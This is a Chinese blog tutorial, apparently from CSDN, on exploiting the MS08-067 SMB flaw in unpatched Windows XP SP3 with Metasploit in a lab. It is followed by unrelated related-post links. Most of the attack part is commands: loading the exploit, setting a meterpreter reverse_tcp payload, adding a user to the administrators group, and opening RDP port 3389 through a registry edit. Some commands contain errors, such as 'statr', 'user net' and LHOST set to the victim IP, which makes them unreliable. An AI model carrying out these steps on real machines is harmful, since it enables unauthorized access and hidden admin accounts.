Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;
1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.csdn.net/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 : 
msfconsole
打开metasploit之前需要连接上postgresql: 
service postgresql statr
3:寻找和加载 Ms08_067模块
(1):使用搜索命令搜索此模块: 
search ms08_067_netapi
(2):应用搜索到的模块地址: 
use exploit/windows/smb/ms08_067_netapi
4: 我们来加载一枚payload: 
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数: 
show options

然后如下图所示:

5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip: 
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:

exploit
6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:
(1):建立用户: 
user net 用户名 密码 /add

(2):提权:

net localgroup administrators wmc /add

7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开: 
netstat -na

(2):显然并没有,那么我们就给它打开:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。
8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:
(3):就成功进入了:
此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。

WIN xp sp3 系统上Ms08_067_netapi漏洞利用相关推荐

  1. win xp sp3系统如何安装微信. 2023-03-01

    下载地址 WeChat_for_XP_SP3_To_Vista.exe 下载后直接安装即可 该版本为老旧版本,官方新版本已不支持xp系统

  2. 装机员 GHOST WIN XP SP3 装机版2016

    软件 软件名称: GHOST WIN XP装机版2016 软件语言: 简体中文 软件大小: 1.76 GB 大小:   发布日期: 2016-05-28 文件名称: ZJY_GHOST XP_SP3_ ...

  3. 【引用】雨林木风Ghost XP SP3系统

    近来在网上闲逛,系统之事我想也不用多说大家都知道, 因WR原因导致各家系统站点都已经关闭下载. 但在网上大家还是可以看到有下载地方的,对于是提供原来无 修改过的系统下载我们当然欢迎,对他们应该感谢分享 ...

  4. 发现了问题解决不了--转:【win XP SP3 不能安装HD声卡驱动的解决办法】

    在装SQL2005时,提示sp3警告,所以就删补丁,结果所有驱动都没有了.系统还是sp3.开始忙碌状驱动,到声卡驱动就怎么也无法成功~解决问题终于发现: 转自: http://www.pczpg.co ...

  5. 常见文件上传漏洞利用

    常见文件上传漏洞利用 一.常见文件上传绕过方法 1.前端javascript校验文件名 2.MIME类型检测绕过 3.大小写绕过 4.双写.点.空格绕过 5.特殊后缀名绕过 6.文件内容检测 7.使用 ...

  6. 文件上传漏洞利用介绍

    目录 文件上传漏洞利用介绍 1.绕过js验证 2.绕过MIME-TYPE验证 3.绕过基于黑名单验证 基于文件后缀名验证介绍 基于文件后缀名验证方式的分类 基于黑名单验证代码分析 利用apache配置 ...

  7. xp计算机无法远程桌面连接,XP sp3系统下远程桌面不能连接到指定计算机的解决方案...

    在使用电脑的过程中,我们常常会使用系统中的远程功能.然而在XP sp3系统中,有的小伙伴使用远程桌面软件时,电脑却弹出远程桌面无法连接到指定计算机的提示.那么遇到这种情况该怎么解决呢?下面想就给大家介 ...

  8. 华硕台式机笔记本预装GHOST XP SP3系统V2013(DVD版)

    华硕台式机&笔记本预装GHOST XP SP3系统V2013(DVD版) 下载地址:http://www.xiazaijidi.com/xp/ 文件名称:ASUS_NotebookPC_V20 ...

  9. 『原创』ewebeditor 2.1.6 上传漏洞利用工具

    朋友说原来的ewebeditor 2.1.6 HTML版用着太麻烦,每次还得输入地址,叫我帮忙写一个...- -||| ewebeditor 2.1.6 上传漏洞利用工具 ewebeditor在网上用 ...

最新文章

  1. Dell服务器配置RAID1+RAID0磁盘阵列
  2. 从MVC到前后端分离
  3. Repo 命令参考资料
  4. APK加壳【2】内存加载dex实现详解
  5. python switch_从邮箱验证小项目说python字符串判断与if判断那些事儿
  6. PostMessage与SendMessage
  7. FineUILearning
  8. 指定查找区间,查找学生姓名并显示是否修改成功
  9. python编程语言优缺点_原创001 第一次接触这个神奇而又无所不能的编程语言:Python...
  10. 1110 Complete Binary Tree(甲级)
  11. 【转】对路径**的访问被拒绝
  12. 通过PCA算法对iris数据集进行降维处理
  13. 原创Maya mel系列插件推荐
  14. IPVS使用的Netfilter Hook点
  15. html发起微信或支付宝支付,vue实现-微信网页中唤起支付宝支付
  16. 关于python无法显示中文的问题:SyntaxError: Non-ASCII character '\xe4' in file test.py on line 3
  17. SpringCloud——服务接口(api)
  18. JAVA JComboBox的监听事件(ActionListener、ItemListener)
  19. YoutubeAPI使用
  20. 医学图像预处理(四)—— 提取包含目标的切片(比如仅提取包含肿瘤或肝脏的切片)

热门文章

  1. linux窗口装饰,Ubuntu通过PPA安装Emerald半透明窗口装饰与主题
  2. 专业解析CCD和CMOS摄像机哪个更优秀
  3. VMware Workstation创建Windows 7虚拟机
  4. linux下单Nginx部署文档
  5. 利用pipenv和pyenv管理多个相互独立的Python虚拟开发环境
  6. 阿里云服务器配置桌面
  7. 如何在阿里云物联网平台上利用已有的 IoT Studio项目模板创建项目
  8. 华硕 RT-N13U 刷机研究资料
  9. 数理统计凌能祥课后习题答案
  10. [Android] 好用的数据库Realm 简单使用 增删改查